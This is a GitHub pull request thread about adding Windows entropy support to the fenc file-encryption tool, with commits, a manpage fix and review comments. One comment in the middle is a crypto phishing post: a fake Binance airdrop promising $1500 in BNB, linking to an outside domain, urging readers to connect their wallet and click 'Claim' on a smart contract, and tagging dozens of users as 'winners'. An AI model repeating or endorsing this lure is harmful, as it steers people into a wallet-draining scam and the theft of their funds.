windoze entropy

anzz1 opened the pull request:
without entropy there is only chaos

anzz1 committed:
windoze entropy

without entropy there is only chaos

anzz1 committed:
Update README.md

anzz1 commented:
compatibility is everything winxp/server2003 and up, i'm not one of those types to introduce changes for no good reason which break functionality unless the user has installed the latest buggy update to windows 11 released 20 minutes ago

mohamedSalehHegazy commented:
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @003sanye, @TIBTHINK, @Niladri24dutta, @mrfelfel, @D4T4R, @jinwenhua, @DhowinHwa, @HanawaHinata, @dev-0x7C6, @cosmo9able, @nhhau, @SirToasty, @Shisir1, @wbj0110, @mrmaxguns, @misskeme, @daviddani1, @Sorrow, @AudileGryphon1, @JanuaryThomas, @arifian933, @roshanjhegde, @sanandmv7, @xyy7260, @Sazzo, @robgering, @z1ko, @zsiciarz, @SkyLightQP, @iyvinjose, @vanwayne8, @carlosherrera1113, @kabaluyot, @pahlevikun, @degelh, @vahepapaz, @dillipchand11, @wzhang878, @wrozka, @Psyruss77, @yutao-long, @DeltapunktAndro, @dongpu1813, @metamorph-dev, @conker84, @Daniel-Xu, @siniorone, @jackqto, @joshua-hester, @androidBeyond

clach04 commented:
Not had chance to play with this, but did a quick read through. I suspect https://github.com/adamierymenko/fenc/blob/a034d91e9106fe70ec9c8e593825b4286f9f61f0/fenc.1#L33 needs updating too.

Thanks for making this available @anzz1 and @adamierymenko

anzz1 committed:
update manpage

remove note about cryptographically secure entropy not being available on windows

anzz1 commented:
@clach04
You are indeed correct. manpages are not a thing in windows so that shouldn't have been there anyway.
